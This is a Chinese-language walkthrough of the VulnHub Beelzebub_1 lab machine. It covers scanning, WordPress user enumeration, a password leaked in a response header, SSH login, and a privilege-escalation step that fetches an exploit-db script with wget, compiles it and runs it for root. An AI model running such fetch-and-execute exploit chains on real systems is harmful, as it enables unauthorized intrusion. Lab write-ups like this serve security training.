Beelzebub_1

下载地址：https://download.vulnhub.com/beelzebub/Beelzebub.zip

攻击者IP：172.17.120.129 nat vmare

受害者IP：172.17.120.133 nat vmare

参考：https://mp.weixin.qq.com/s?__biz=MzIzNDE0Mzk0NA==&mid=2649593209&idx=1&sn=57e5e53c0ca9c71c67832965b476d85e&chksm=f0e3dcdec79455c8815012d227fe11d9ab7371c42df9ddf0384219a9dfb5d49a62608b10f041&scene=21#wechat_redirect

https://www.freebuf.com/articles/web/397700.html

https://blog.csdn.net/qq_63844103/article/details/127033713

主机发现

端口扫描

目录扫描

发现phpmyadmin

尝试sql，密码爆破都失败了

这个404页面源码有东西

怪不得目录扫描是200，访问是404，作者把这个页面做成了404的样子

根据提示beelzebub加密后

d18e1e22becbd915b45e0e655429d487

不是phpmyadmin的密码，也不是ssh密码

那就可能是个目录

通过对比发现，确实是目录，跟随便输入的不一样

dirsearch -u 172.17.120.133/d18e1e22becbd915b45e0e655429d487 

目录扫描

扫描到wp的目录

但是很卡

会被重定向到192.168.1.6

发现用户valak， krampus

wpscan --url http://172.17.120.133/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force -e --plugins-detection aggressive

--ignore-main-redirect：忽略从主 URL 的重定向。这意味着 WPScan 不会自动跟随从目标 URL 的 301 或 302 重定向。--force：强制扫描，即使站点看起来不是一个 WordPress 站点。这在站点使用了非典型的结构或 URL 时尤其有用。-e：用于枚举。默认情况下，它会尝试枚举基本信息，如用户、插件等。可以与其他特定的枚举选项结合使用。--plugins-detection aggressive：使用激进的方法检测插件。这种方法会尽可能多地请求 URL，从而增加检测的可能性，但同时，这也可能会对服务器造成更大的负荷。

在upload发现Talk To VALAK/目录

随便输入用户的名字后在相应头中发现密码

M4k3Ad3a1

省去登录wp和反弹shell，直接尝试ssh

果然这个密码是krampus的

查看suid权限

history

查看历史命令发现wget https://www.exploit-db.com/download/47009

作者下载过提权脚本并运行获得了root

这个脚本是ftp低于版本15.1.7的提权脚本

wget https://www.exploit-db.com/download/47009 下载脚本

mv 47009 exp.c 改名字

gcc exp.c -o exp 编译

chmod +x exp 给执行权限

./exp 执行

获得root

原文始发于微信公众号（王之暴龙战神）：Beelzebub_1